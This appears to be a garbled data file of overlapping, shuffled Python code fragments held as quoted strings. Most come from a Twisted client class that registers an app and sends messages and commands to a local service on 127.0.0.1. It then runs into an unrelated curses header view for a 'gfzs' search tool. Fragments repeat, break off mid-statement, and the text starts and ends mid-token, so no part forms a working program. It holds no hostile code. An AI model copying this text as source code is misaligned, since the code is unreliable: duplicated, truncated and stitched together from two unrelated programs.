regAck(result): assert 'success' in result['result'] self.iface.registered = True def failed(reason):", "if self.obj is None: factory = pb.PBClientFactory() reactor.connectTCP(\"127.0.0.1\", Com.myPort, factory) d = factory.getRootObject()", "regAck(result): assert 'success' in result['result'] self.iface.registered = True def failed(reason): print reason def", "def __init__(self, name, port): self.readCB = None self._comiface = None self.name = name", "None self._comiface = None self.name = name self.port = port def start(self): self._comiface", "reactor.connectTCP(\"127.0.0.1\", Com.myPort, factory) d = factory.getRootObject() d.addCallbacks(connected, failed) else: d = connected(self.obj) return", "reason def connected(obj): self.obj = obj regPacket = {'cmd': 'reg_app', 'name':self.iface.name,'port':self.port} d =", "register(self): def regAck(result): assert 'success' in result['result'] self.iface.registered = True def failed(reason): print", "obj.broker.transport.loseConnection(), failed) return d if self.obj is None: factory = pb.PBClientFactory() reactor.connectTCP(\"127.0.0.1\", Com.myPort,", "start(self): self._comiface = _ComIFace(self) self.tcpPort = reactor.listenTCP(self.port, pb.PBServerFactory(self._comiface), interface='127.0.0.1') d = self._comiface.unregister() d.addCallback(lambda", "self.obj = obj # def closeAndReturn (result): # obj.broker.transport.loseConnection() # return result d", "= factory.getRootObject() d.addCallbacks(connected, failed) else: d = connected(self.obj) return d def unregister(self): def", "return d def doCmd(self,cmd): def writeAck(result): #print self.success(str(result)) return result def failed(reason): log.msg(self.failure", "reactor from comlocal.core.Com import Com class ComIFace (object): def __init__(self, name, port): self.readCB", "result: obj.broker.transport.loseConnection(), failed) return d if self.obj is None: factory = pb.PBClientFactory() reactor.connectTCP(\"127.0.0.1\",", "= self._comiface.unregister() d.addCallback(lambda res: self._comiface.register()) return d def stop(self): d = self._comiface.unregister() port,", "self.tcpPort = self.tcpPort, None d.addCallback(lambda res: port.stopListening()) return d def write(self, msg, dest):", "self.iface.registered = True def failed(reason): print reason def connected(obj): self.obj = obj regPacket", "else: d = connected(self.obj) return d def unregister(self): def regAck(result): #assert 'success' in", "doCmd(self,cmd): def writeAck(result): #print self.success(str(result)) return result def failed(reason): log.msg(self.failure (str(reason))) reason.printTraceback() def", "Com.myPort, factory) d = factory.getRootObject() d.addCallbacks(connected, failed) else: d = connected(self.obj) return d", "name, port): self.readCB = None self._comiface = None self.name = name self.port =", "{'msg':msg,'dest':dest} return self._comiface.doWrite(message) def cmd(self, cmd, **kwargs): command = {'cmd':cmd} for key in", "{'cmd': 'reg_app', 'name':self.iface.name,'port':self.port} d = obj.callRemote('cmd', regPacket) d.addCallbacks(regAck,failed) #d.addCallbacks(lambda result: obj.broker.transport.loseConnection(), failed) return", "port): self.readCB = None self._comiface = None self.name = name self.port = port", "connected(obj): self.obj = obj regPacket = {'cmd': 'reg_app', 'name':self.iface.name,'port':self.port} d = obj.callRemote('cmd', regPacket)", "result def failed(reason): log.msg(self.failure (str(reason))) reason.printTraceback() def connected(obj): self.obj = obj def closeAndReturn", "self._comiface = None self.name = name self.port = port def start(self): self._comiface =", "= self.iface.port self.obj = None def register(self): def regAck(result): assert 'success' in result['result']", "d = connected(self.obj) return d def doCmd(self,cmd): def writeAck(result): #print self.success(str(result)) return result", "failed) d.addCallbacks(closeAndReturn, failed) return d if self.obj is None: factory = pb.PBClientFactory() reactor.connectTCP(\"127.0.0.1\",", "stop(self): d = self._comiface.unregister() port, self.tcpPort = self.tcpPort, None d.addCallback(lambda res: port.stopListening()) return", "None d.addCallback(lambda res: port.stopListening()) return d def write(self, msg, dest): message = {'msg':msg,'dest':dest}", "= None def register(self): def regAck(result): assert 'success' in result['result'] self.iface.registered = True", "factory.getRootObject() d.addCallbacks(connected, failed) else: d = connected(self.obj) return d def doCmd(self,cmd): def writeAck(result):", "= {'cmd':cmd} for key in kwargs: command[key] = kwargs[key] return self._comiface.doCmd(command) class _ComIFace(pb.Root):", "= iface self.port = self.iface.port self.obj = None def register(self): def regAck(result): assert", "self.port = self.iface.port self.obj = None def register(self): def regAck(result): assert 'success' in", "self.obj = None def register(self): def regAck(result): assert 'success' in result['result'] self.iface.registered =", "d.addCallbacks(closeAndReturn, failed) return d if self.obj is None: factory = pb.PBClientFactory() reactor.connectTCP(\"127.0.0.1\", Com.myPort,", "writeAck(result): return result def failed(reason): print reason reason.printTraceback() def connected(obj): self.obj = obj", "reason reason.printTraceback() def connected(obj): self.obj = obj # def closeAndReturn (result): # obj.broker.transport.loseConnection()", "reason def connected(obj): self.obj = obj regPacket = {'cmd': 'unreg_app', 'name':self.iface.name,'port':self.iface.port} d =", "#d.addCallbacks(lambda result: obj.broker.transport.loseConnection(), failed) return d if self.obj is None: factory = pb.PBClientFactory()", "regPacket) d.addCallbacks(regAck,failed) #d.addCallbacks(lambda result: obj.broker.transport.loseConnection(), failed) return d if self.obj is None: factory", "failed) else: d = connected(self.obj) return d def unregister(self): def regAck(result): #assert 'success'", "connected(obj): self.obj = obj regPacket = {'cmd': 'unreg_app', 'name':self.iface.name,'port':self.iface.port} d = obj.callRemote('cmd', regPacket)", "return d def write(self, msg, dest): message = {'msg':msg,'dest':dest} return self._comiface.doWrite(message) def cmd(self,", "'name':self.iface.name,'port':self.port} d = obj.callRemote('cmd', regPacket) d.addCallbacks(regAck,failed) #d.addCallbacks(lambda result: obj.broker.transport.loseConnection(), failed) return d if", "(result): #obj.broker.transport.loseConnection() return result d = obj.callRemote('cmd', cmd) d.addCallbacks(writeAck, failed) d.addCallbacks(closeAndReturn, failed) return", "def doCmd(self,cmd): def writeAck(result): #print self.success(str(result)) return result def failed(reason): log.msg(self.failure (str(reason))) reason.printTraceback()", "= reactor.listenTCP(self.port, pb.PBServerFactory(self._comiface), interface='127.0.0.1') d = self._comiface.unregister() d.addCallback(lambda res: self._comiface.register()) return d def", "is None: factory = pb.PBClientFactory() reactor.connectTCP(\"127.0.0.1\", Com.myPort, factory) d = factory.getRootObject() d.addCallbacks(connected, failed)", "d.addCallbacks(writeAck, failed) d.addCallbacks(closeAndReturn, failed) return d if self.obj is None: factory = pb.PBClientFactory()", "{'cmd':cmd} for key in kwargs: command[key] = kwargs[key] return self._comiface.doCmd(command) class _ComIFace(pb.Root): def", "class ComIFace (object): def __init__(self, name, port): self.readCB = None self._comiface = None", "return result def failed(reason): print reason reason.printTraceback() def connected(obj): self.obj = obj #", "else: d = connected(self.obj) return d def doCmd(self,cmd): def writeAck(result): #print self.success(str(result)) return", "in kwargs: command[key] = kwargs[key] return self._comiface.doCmd(command) class _ComIFace(pb.Root): def __init__(self, iface): self.iface", "res: self._comiface.register()) return d def stop(self): d = self._comiface.unregister() port, self.tcpPort = self.tcpPort,", "kwargs: command[key] = kwargs[key] return self._comiface.doCmd(command) class _ComIFace(pb.Root): def __init__(self, iface): self.iface =", "print reason def connected(obj): self.obj = obj regPacket = {'cmd': 'reg_app', 'name':self.iface.name,'port':self.port} d", "kwargs[key] return self._comiface.doCmd(command) class _ComIFace(pb.Root): def __init__(self, iface): self.iface = iface self.port =", "obj.callRemote('cmd', cmd) d.addCallbacks(writeAck, failed) d.addCallbacks(closeAndReturn, failed) return d if self.obj is None: factory", "(result): # obj.broker.transport.loseConnection() # return result d = obj.callRemote('write', msg) d.addCallbacks(writeAck, failed) #d.addCallbacks(closeAndReturn,", "None def register(self): def regAck(result): assert 'success' in result['result'] self.iface.registered = True def", "key in kwargs: command[key] = kwargs[key] return self._comiface.doCmd(command) class _ComIFace(pb.Root): def __init__(self, iface):", "None: factory = pb.PBClientFactory() reactor.connectTCP(\"127.0.0.1\", Com.myPort, factory) d = factory.getRootObject() d.addCallbacks(connected, failed) else:", "(str(reason))) reason.printTraceback() def connected(obj): self.obj = obj def closeAndReturn (result): #obj.broker.transport.loseConnection() return result", "connected(self.obj) return d def doCmd(self,cmd): def writeAck(result): #print self.success(str(result)) return result def failed(reason):", "message = {'msg':msg,'dest':dest} return self._comiface.doWrite(message) def cmd(self, cmd, **kwargs): command = {'cmd':cmd} for", "# def closeAndReturn (result): # obj.broker.transport.loseConnection() # return result d = obj.callRemote('write', msg)", "# obj.broker.transport.loseConnection() # return result d = obj.callRemote('write', msg) d.addCallbacks(writeAck, failed) #d.addCallbacks(closeAndReturn, failed)", "interface='127.0.0.1') d = self._comiface.unregister() d.addCallback(lambda res: self._comiface.register()) return d def stop(self): d =", "port.stopListening()) return d def write(self, msg, dest): message = {'msg':msg,'dest':dest} return self._comiface.doWrite(message) def", "in result['result'] self.iface.registered = False def failed(reason): print reason def connected(obj): self.obj =", "log.msg(self.failure (str(reason))) reason.printTraceback() def connected(obj): self.obj = obj def closeAndReturn (result): #obj.broker.transport.loseConnection() return", "factory.getRootObject() d.addCallbacks(connected, failed) else: d = connected(self.obj) return d def remote_read(self, message): self.iface.readCB(message)", "def doWrite(self, msg): def writeAck(result): return result def failed(reason): print reason reason.printTraceback() def", "False def failed(reason): print reason def connected(obj): self.obj = obj regPacket = {'cmd':", "= True def failed(reason): print reason def connected(obj): self.obj = obj regPacket =", "= obj.callRemote('cmd', regPacket) d.addCallbacks(regAck,failed) #d.addCallbacks(lambda result: obj.broker.transport.loseConnection(), failed) return d if self.obj is", "= pb.PBClientFactory() reactor.connectTCP(\"127.0.0.1\", Com.myPort, factory) d = factory.getRootObject() d.addCallbacks(connected, failed) else: d =", "failed) else: d = connected(self.obj) return d def doCmd(self,cmd): def writeAck(result): #print self.success(str(result))", "reason.printTraceback() def connected(obj): self.obj = obj def closeAndReturn (result): #obj.broker.transport.loseConnection() return result d", "connected(obj): self.obj = obj def closeAndReturn (result): #obj.broker.transport.loseConnection() return result d = obj.callRemote('cmd',", "from twisted.spread import pb from twisted.internet import reactor from comlocal.core.Com import Com class", "failed) else: d = connected(self.obj) return d def doWrite(self, msg): def writeAck(result): return", "self.tcpPort = reactor.listenTCP(self.port, pb.PBServerFactory(self._comiface), interface='127.0.0.1') d = self._comiface.unregister() d.addCallback(lambda res: self._comiface.register()) return d", "assert 'success' in result['result'] self.iface.registered = True def failed(reason): print reason def connected(obj):", "command[key] = kwargs[key] return self._comiface.doCmd(command) class _ComIFace(pb.Root): def __init__(self, iface): self.iface = iface", "def writeAck(result): #print self.success(str(result)) return result def failed(reason): log.msg(self.failure (str(reason))) reason.printTraceback() def connected(obj):", "connected(self.obj) return d def doWrite(self, msg): def writeAck(result): return result def failed(reason): print", "regPacket = {'cmd': 'reg_app', 'name':self.iface.name,'port':self.port} d = obj.callRemote('cmd', regPacket) d.addCallbacks(regAck,failed) #d.addCallbacks(lambda result: obj.broker.transport.loseConnection(),", "return d if self.obj is None: factory = pb.PBClientFactory() reactor.connectTCP(\"127.0.0.1\", Com.myPort, factory) d", "pb from twisted.internet import reactor from comlocal.core.Com import Com class ComIFace (object): def", "d = self._comiface.unregister() port, self.tcpPort = self.tcpPort, None d.addCallback(lambda res: port.stopListening()) return d", "= obj.callRemote('cmd', cmd) d.addCallbacks(writeAck, failed) d.addCallbacks(closeAndReturn, failed) return d if self.obj is None:", "self.iface.port self.obj = None def register(self): def regAck(result): assert 'success' in result['result'] self.iface.registered", "closeAndReturn (result): # obj.broker.transport.loseConnection() # return result d = obj.callRemote('write', msg) d.addCallbacks(writeAck, failed)", "def writeAck(result): return result def failed(reason): print reason reason.printTraceback() def connected(obj): self.obj =" ]
[ "dirname, join, realpath project_dirname = dirname(dirname(realpath(__file__))) path = join(project_dirname, \"bank2ynab\") if path not", "from os.path import dirname, join, realpath project_dirname = dirname(dirname(realpath(__file__))) path = join(project_dirname, \"bank2ynab\")", "import sys from os.path import dirname, join, realpath project_dirname = dirname(dirname(realpath(__file__))) path =", "join, realpath project_dirname = dirname(dirname(realpath(__file__))) path = join(project_dirname, \"bank2ynab\") if path not in", "os.path import dirname, join, realpath project_dirname = dirname(dirname(realpath(__file__))) path = join(project_dirname, \"bank2ynab\") if", "import dirname, join, realpath project_dirname = dirname(dirname(realpath(__file__))) path = join(project_dirname, \"bank2ynab\") if path", "<reponame>Pezmc/bank2ynab<gh_stars>10-100 import sys from os.path import dirname, join, realpath project_dirname = dirname(dirname(realpath(__file__))) path", "project_dirname = dirname(dirname(realpath(__file__))) path = join(project_dirname, \"bank2ynab\") if path not in sys.path: sys.path.append(path)", "realpath project_dirname = dirname(dirname(realpath(__file__))) path = join(project_dirname, \"bank2ynab\") if path not in sys.path:", "sys from os.path import dirname, join, realpath project_dirname = dirname(dirname(realpath(__file__))) path = join(project_dirname," ]
[ "current_app, Blueprint, render_template, redirect, url_for, request from flaskapp.logic.ab import runab views = Blueprint('views',", "c, \"-n\", n, url] print(args) result = runab(args) # return render_template(\"ab.html\") return result", "n = \"20\" c = \"5\" if request.json: print(request.json) c = str(request.json['c']) n", "str(request.json['n']) url = str(request.json['url']) args = [\"ab\", \"-c\", c, \"-n\", n, url] print(args)", "runab views = Blueprint('views', __name__) @views.route('/') def home(): return render_template(\"base.html\") @views.route('/ab', methods=[\"GET\", \"POST\"])", "from flaskapp.logic.ab import runab views = Blueprint('views', __name__) @views.route('/') def home(): return render_template(\"base.html\")", "def home(): return render_template(\"base.html\") @views.route('/ab', methods=[\"GET\", \"POST\"]) def ab_get(): url = \"http://www.github.com/\" n", "= \"20\" c = \"5\" if request.json: print(request.json) c = str(request.json['c']) n =", "def ab_get(): url = \"http://www.github.com/\" n = \"20\" c = \"5\" if request.json:", "Blueprint, render_template, redirect, url_for, request from flaskapp.logic.ab import runab views = Blueprint('views', __name__)", "from flask import current_app, Blueprint, render_template, redirect, url_for, request from flaskapp.logic.ab import runab", "methods=[\"GET\", \"POST\"]) def ab_get(): url = \"http://www.github.com/\" n = \"20\" c = \"5\"", "\"http://www.github.com/\" n = \"20\" c = \"5\" if request.json: print(request.json) c = str(request.json['c'])", "if request.json: print(request.json) c = str(request.json['c']) n = str(request.json['n']) url = str(request.json['url']) args", "= str(request.json['url']) args = [\"ab\", \"-c\", c, \"-n\", n, url] print(args) result =", "= Blueprint('views', __name__) @views.route('/') def home(): return render_template(\"base.html\") @views.route('/ab', methods=[\"GET\", \"POST\"]) def ab_get():", "= [\"ab\", \"-c\", c, \"-n\", n, url] print(args) result = runab(args) # return", "str(request.json['c']) n = str(request.json['n']) url = str(request.json['url']) args = [\"ab\", \"-c\", c, \"-n\",", "\"5\" if request.json: print(request.json) c = str(request.json['c']) n = str(request.json['n']) url = str(request.json['url'])", "url = str(request.json['url']) args = [\"ab\", \"-c\", c, \"-n\", n, url] print(args) result", "= str(request.json['n']) url = str(request.json['url']) args = [\"ab\", \"-c\", c, \"-n\", n, url]", "[\"ab\", \"-c\", c, \"-n\", n, url] print(args) result = runab(args) # return render_template(\"ab.html\")", "\"-c\", c, \"-n\", n, url] print(args) result = runab(args) # return render_template(\"ab.html\") return", "__name__) @views.route('/') def home(): return render_template(\"base.html\") @views.route('/ab', methods=[\"GET\", \"POST\"]) def ab_get(): url =", "c = \"5\" if request.json: print(request.json) c = str(request.json['c']) n = str(request.json['n']) url", "<gh_stars>0 from flask import current_app, Blueprint, render_template, redirect, url_for, request from flaskapp.logic.ab import", "url_for, request from flaskapp.logic.ab import runab views = Blueprint('views', __name__) @views.route('/') def home():", "print(request.json) c = str(request.json['c']) n = str(request.json['n']) url = str(request.json['url']) args = [\"ab\",", "= str(request.json['c']) n = str(request.json['n']) url = str(request.json['url']) args = [\"ab\", \"-c\", c,", "views = Blueprint('views', __name__) @views.route('/') def home(): return render_template(\"base.html\") @views.route('/ab', methods=[\"GET\", \"POST\"]) def", "home(): return render_template(\"base.html\") @views.route('/ab', methods=[\"GET\", \"POST\"]) def ab_get(): url = \"http://www.github.com/\" n =", "str(request.json['url']) args = [\"ab\", \"-c\", c, \"-n\", n, url] print(args) result = runab(args)", "\"POST\"]) def ab_get(): url = \"http://www.github.com/\" n = \"20\" c = \"5\" if", "import current_app, Blueprint, render_template, redirect, url_for, request from flaskapp.logic.ab import runab views =", "redirect, url_for, request from flaskapp.logic.ab import runab views = Blueprint('views', __name__) @views.route('/') def", "@views.route('/') def home(): return render_template(\"base.html\") @views.route('/ab', methods=[\"GET\", \"POST\"]) def ab_get(): url = \"http://www.github.com/\"", "request from flaskapp.logic.ab import runab views = Blueprint('views', __name__) @views.route('/') def home(): return", "ab_get(): url = \"http://www.github.com/\" n = \"20\" c = \"5\" if request.json: print(request.json)", "render_template, redirect, url_for, request from flaskapp.logic.ab import runab views = Blueprint('views', __name__) @views.route('/')", "Blueprint('views', __name__) @views.route('/') def home(): return render_template(\"base.html\") @views.route('/ab', methods=[\"GET\", \"POST\"]) def ab_get(): url", "= \"5\" if request.json: print(request.json) c = str(request.json['c']) n = str(request.json['n']) url =", "flask import current_app, Blueprint, render_template, redirect, url_for, request from flaskapp.logic.ab import runab views", "import runab views = Blueprint('views', __name__) @views.route('/') def home(): return render_template(\"base.html\") @views.route('/ab', methods=[\"GET\",", "= \"http://www.github.com/\" n = \"20\" c = \"5\" if request.json: print(request.json) c =", "\"20\" c = \"5\" if request.json: print(request.json) c = str(request.json['c']) n = str(request.json['n'])", "request.json: print(request.json) c = str(request.json['c']) n = str(request.json['n']) url = str(request.json['url']) args =", "c = str(request.json['c']) n = str(request.json['n']) url = str(request.json['url']) args = [\"ab\", \"-c\",", "return render_template(\"base.html\") @views.route('/ab', methods=[\"GET\", \"POST\"]) def ab_get(): url = \"http://www.github.com/\" n = \"20\"", "render_template(\"base.html\") @views.route('/ab', methods=[\"GET\", \"POST\"]) def ab_get(): url = \"http://www.github.com/\" n = \"20\" c", "n = str(request.json['n']) url = str(request.json['url']) args = [\"ab\", \"-c\", c, \"-n\", n,", "args = [\"ab\", \"-c\", c, \"-n\", n, url] print(args) result = runab(args) #", "url = \"http://www.github.com/\" n = \"20\" c = \"5\" if request.json: print(request.json) c", "@views.route('/ab', methods=[\"GET\", \"POST\"]) def ab_get(): url = \"http://www.github.com/\" n = \"20\" c =", "flaskapp.logic.ab import runab views = Blueprint('views', __name__) @views.route('/') def home(): return render_template(\"base.html\") @views.route('/ab'," ]
[ "= False self.window.addstr(0, i, c, self.color.google(\"o\")) else: self.window.addstr(0, i, c, self.color.google(\"o2\")) else: self.window.addstr(0,", "Disable the mouse cursor. curses.curs_set(0) target = TestHeader(stdscr) error = None try: target.run()", "TestHeader(stdscr) error = None try: target.run() except curses.error as e: error = str(e)", "import Base import gfzs.utils.logger as logger if os.environ.get(\"DEBUG\"): import gfzs.utils.debug as debug #", "when 「python3 gfzs/controller.py」 except ModuleNotFoundError: # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(\"../\")))) import info from views.base import", "# https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) import info import utils.logger as logger from base import Base", "__name__ == \"__main__\": # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) import info import utils.logger as logger from", "start_index += len(FUZZY) + 1 self.window.addstr(0, start_index, SEARCH, self.color.search()) # Write verion start_index", "curses.initscr() color.init() # turn off automatic echoing of keys to the screen curses.noecho()", "as logger if os.environ.get(\"DEBUG\"): import utils.debug as debug class Header(Base): def __init__(self, stdscr):", "「python3 gfzs/views/header.py」 if __name__ == \"__main__\": # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) import info import utils.logger", "0, \"log_path\": \"./tmp/gfzs.log\"} logger.init_properties(**properties) logger.debug(\"start %s\" % progname) def handle_sigint(signum, frame): logger.debug(\"detect SIGINT", "logger from base import Base if os.environ.get(\"DEBUG\"): import utils.debug as debug # need", "+= len(FUZZY) + 1 self.window.addstr(0, start_index, SEARCH, self.color.search()) # Write verion start_index +=", "curses.endwin() def _loop(self): self.create() while True: try: user_input = self.window.getch() except curses.error: continue", "= \"Google\" FUZZY = \"Fuzzy\" SEARCH = \"Search\" try: # need when 「python3", "logger.debug(\"init curses\") stdscr = curses.initscr() color.init() # turn off automatic echoing of keys", "class Header(Base): def __init__(self, stdscr): super().__init__(stdscr, None, \"header\") self.version = \"(%s)\" % info.__version__", "# Disable the mouse cursor. curses.curs_set(0) target = TestHeader(stdscr) error = None try:", "__name__ == \"__main__\": import signal # local # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) from model import", "sys.exit(1) # initscr() returns a window object representing the entire screen. logger.debug(\"init curses\")", "mouse cursor. curses.curs_set(0) target = TestHeader(stdscr) error = None try: target.run() except curses.error", "https://docs.python.org/ja/3/library/curses.html#curses.cbreak curses.cbreak() # Disable the mouse cursor. curses.curs_set(0) target = TestHeader(stdscr) error =", "\"__main__\": class TestHeader(Header): def run(self): self._loop() def _end_curses(self): \"\"\" Terminates the curses application.", "error) logger.debug(\"exit 1\") sys.exit(1) # initscr() returns a window object representing the entire", "class TestHeader(Header): def run(self): self._loop() def _end_curses(self): \"\"\" Terminates the curses application. \"\"\"", "except ModuleNotFoundError: # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(\"../\")))) import info from views.base import Base import utils.logger", "invalid.\") for error in runtime_config.errors: logger.error(error) print(\"Error: %s\" % error) logger.debug(\"exit 1\") sys.exit(1)", "import info from views.base import Base import utils.logger as logger if os.environ.get(\"DEBUG\"): import", "try: # need when 「python3 gfzs/views/header.py」 if __name__ == \"__main__\": # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))", "# need when 「python3 gfzs/controller.py」 except ModuleNotFoundError: # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(\"../\")))) import info from", "True: try: user_input = self.window.getch() except curses.error: continue except KeyboardInterrupt: break if user_input", "is invalid.\") for error in runtime_config.errors: logger.error(error) print(\"Error: %s\" % error) logger.debug(\"exit 1\")", "self.reset() if __name__ == \"__main__\": import signal # local # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) from", "= curses.newwin(2, self.parent_width, 0, 0) # https://stackoverflow.com/a/53016371/9434894 def _make_header(self): start_index = 0 #", "from gfzs import info from gfzs.views.base import Base import gfzs.utils.logger as logger if", "+= len(GOOGLE) + 1 self.window.addstr(0, start_index, FUZZY, self.color.fuzzy()) # Write Search start_index +=", "- len(self.copyright), self.copyright, self.color.copy_right(), ) self.window.hline( 1, 0, curses.ACS_HLINE | self.colors[\"hline\"], self.parent_width )", "try: target.run() except curses.error as e: error = str(e) finally: target._end_curses() if error", "import utils.debug as debug class Header(Base): def __init__(self, stdscr): super().__init__(stdscr, None, \"header\") self.version", "from gfzs.views.base import Base import gfzs.utils.logger as logger if os.environ.get(\"DEBUG\"): import gfzs.utils.debug as", "Terminates the curses application. \"\"\" logger.debug(\"[TestHeader] end curses\") curses.nocbreak() self.window.keypad(0) curses.echo() curses.endwin() def", "reset(self): logger.debug(\"[Header] reset\") self.window.erase() self._init_layout() self._make_header() self.window.refresh() def _init_layout(self): self.parent_height, self.parent_width = self.stdscr.getmaxyx()", "\"__main__\": import signal # local # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) from model import Model import", "gfzs.utils.logger as logger if os.environ.get(\"DEBUG\"): import gfzs.utils.debug as debug # need when 「python3", "sys.exit(0) signal.signal(signal.SIGINT, handle_sigint) runtime_config.init() if not runtime_config.valid(): logger.debug(\"[print] 'Config is invalid.'\") print(\"Config is", "c = google[i] if c == \"o\": if first_o: first_o = False self.window.addstr(0,", "for error in runtime_config.errors: logger.error(error) print(\"Error: %s\" % error) logger.debug(\"exit 1\") sys.exit(1) #", "as logger if os.environ.get(\"DEBUG\"): import gfzs.utils.debug as debug # need when 「python3 gfzs/controller.py」", "i, c, self.color.google(c)) # Write Fuzzy start_index += len(GOOGLE) + 1 self.window.addstr(0, start_index,", "self._loop() def _end_curses(self): \"\"\" Terminates the curses application. \"\"\" logger.debug(\"[TestHeader] end curses\") curses.nocbreak()", "\"./tmp/gfzs.log\"} logger.init_properties(**properties) logger.debug(\"start %s\" % progname) def handle_sigint(signum, frame): logger.debug(\"detect SIGINT (Ctrl-c)\") logger.debug(\"exit", "def _make_header(self): start_index = 0 # Write Google google = list(GOOGLE) first_o =", "SEARCH, self.color.search()) # Write verion start_index += len(SEARCH) + 1 self.window.addstr(0, start_index, self.version,", "start_index, FUZZY, self.color.fuzzy()) # Write Search start_index += len(FUZZY) + 1 self.window.addstr(0, start_index,", "self.window.addstr(0, i, c, self.color.google(\"o\")) else: self.window.addstr(0, i, c, self.color.google(\"o2\")) else: self.window.addstr(0, i, c,", "_end_curses(self): \"\"\" Terminates the curses application. \"\"\" logger.debug(\"[TestHeader] end curses\") curses.nocbreak() self.window.keypad(0) curses.echo()", "logger if os.environ.get(\"DEBUG\"): import utils.debug as debug class Header(Base): def __init__(self, stdscr): super().__init__(stdscr,", "target = TestHeader(stdscr) error = None try: target.run() except curses.error as e: error", "os.environ.get(\"DEBUG\"): import utils.debug as debug # need when 「cat fixtures/rust.json | python -m", "i, c, self.color.google(\"o\")) else: self.window.addstr(0, i, c, self.color.google(\"o2\")) else: self.window.addstr(0, i, c, self.color.google(c))", "# https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(\"../\")))) import info from views.base import Base import utils.logger as logger", "logger.debug(\"[Header] reset\") self.window.erase() self._init_layout() self._make_header() self.window.refresh() def _init_layout(self): self.parent_height, self.parent_width = self.stdscr.getmaxyx() self.window", "{\"progname\": progname, \"severity\": 0, \"log_path\": \"./tmp/gfzs.log\"} logger.init_properties(**properties) logger.debug(\"start %s\" % progname) def handle_sigint(signum,", "frame): logger.debug(\"detect SIGINT (Ctrl-c)\") logger.debug(\"exit 0\") sys.exit(0) signal.signal(signal.SIGINT, handle_sigint) runtime_config.init() if not runtime_config.valid():", "runtime_config.errors: logger.error(error) print(\"Error: %s\" % error) logger.debug(\"exit 1\") sys.exit(1) # initscr() returns a", "Base if os.environ.get(\"DEBUG\"): import utils.debug as debug # need when 「cat fixtures/rust.json |", "+ 1 self.window.addstr(0, start_index, FUZZY, self.color.fuzzy()) # Write Search start_index += len(FUZZY) +", "\"log_path\": \"./tmp/gfzs.log\"} logger.init_properties(**properties) logger.debug(\"start %s\" % progname) def handle_sigint(signum, frame): logger.debug(\"detect SIGINT (Ctrl-c)\")", "logger.debug(\"exit 0\") sys.exit(0) signal.signal(signal.SIGINT, handle_sigint) runtime_config.init() if not runtime_config.valid(): logger.debug(\"[print] 'Config is invalid.'\")", "self.parent_height, self.parent_width = self.stdscr.getmaxyx() self.window = curses.newwin(2, self.parent_width, 0, 0) # https://stackoverflow.com/a/53016371/9434894 def", "self.parent_width, 0, 0) # https://stackoverflow.com/a/53016371/9434894 def _make_header(self): start_index = 0 # Write Google", "Write Copyright self.window.addstr( 0, self.parent_width - len(self.copyright), self.copyright, self.color.copy_right(), ) self.window.hline( 1, 0,", "\"header\") self.version = \"(%s)\" % info.__version__ self.copyright = info.__copyright__ def create(self): logger.debug(\"[Header] create\")", "0, curses.ACS_HLINE | self.colors[\"hline\"], self.parent_width ) if __name__ == \"__main__\": class TestHeader(Header): def", "0, 0) # https://stackoverflow.com/a/53016371/9434894 def _make_header(self): start_index = 0 # Write Google google", "end curses\") curses.nocbreak() self.window.keypad(0) curses.echo() curses.endwin() def _loop(self): self.create() while True: try: user_input", "(Ctrl-c)\") logger.debug(\"exit 0\") sys.exit(0) signal.signal(signal.SIGINT, handle_sigint) runtime_config.init() if not runtime_config.valid(): logger.debug(\"[print] 'Config is", "off automatic echoing of keys to the screen curses.noecho() # Buffering off #", "import utils.debug as debug # need when 「cat fixtures/rust.json | python -m gfzs」", "Google google = list(GOOGLE) first_o = True for i in range(len(google)): c =", "str(e) finally: target._end_curses() if error != None: logger.error(error) print(error) logger.debug(\"end %s\" % progname,", "runtime_config import utils.color as color progname = \"gfzs.views.header\" properties = {\"progname\": progname, \"severity\":", "# https://docs.python.org/ja/3/library/curses.html#curses.cbreak curses.cbreak() # Disable the mouse cursor. curses.curs_set(0) target = TestHeader(stdscr) error", "screen. logger.debug(\"init curses\") stdscr = curses.initscr() color.init() # turn off automatic echoing of", "logger.debug(\"[TestHeader] end curses\") curses.nocbreak() self.window.keypad(0) curses.echo() curses.endwin() def _loop(self): self.create() while True: try:", "1 self.window.addstr(0, start_index, FUZZY, self.color.fuzzy()) # Write Search start_index += len(FUZZY) + 1", "automatic echoing of keys to the screen curses.noecho() # Buffering off # https://docs.python.org/ja/3/library/curses.html#curses.cbreak", "of keys to the screen curses.noecho() # Buffering off # https://docs.python.org/ja/3/library/curses.html#curses.cbreak curses.cbreak() #", "import utils.color as color progname = \"gfzs.views.header\" properties = {\"progname\": progname, \"severity\": 0,", "import Model import runtime.config as runtime_config import utils.color as color progname = \"gfzs.views.header\"", "start_index += len(SEARCH) + 1 self.window.addstr(0, start_index, self.version, self.color.version()) # Write Copyright self.window.addstr(", "as e: error = str(e) finally: target._end_curses() if error != None: logger.error(error) print(error)", "0\") sys.exit(0) signal.signal(signal.SIGINT, handle_sigint) runtime_config.init() if not runtime_config.valid(): logger.debug(\"[print] 'Config is invalid.'\") print(\"Config", "the entire screen. logger.debug(\"init curses\") stdscr = curses.initscr() color.init() # turn off automatic", "Write Fuzzy start_index += len(GOOGLE) + 1 self.window.addstr(0, start_index, FUZZY, self.color.fuzzy()) # Write", "logger.init_properties(**properties) logger.debug(\"start %s\" % progname) def handle_sigint(signum, frame): logger.debug(\"detect SIGINT (Ctrl-c)\") logger.debug(\"exit 0\")", "curses.echo() curses.endwin() def _loop(self): self.create() while True: try: user_input = self.window.getch() except curses.error:", "e: error 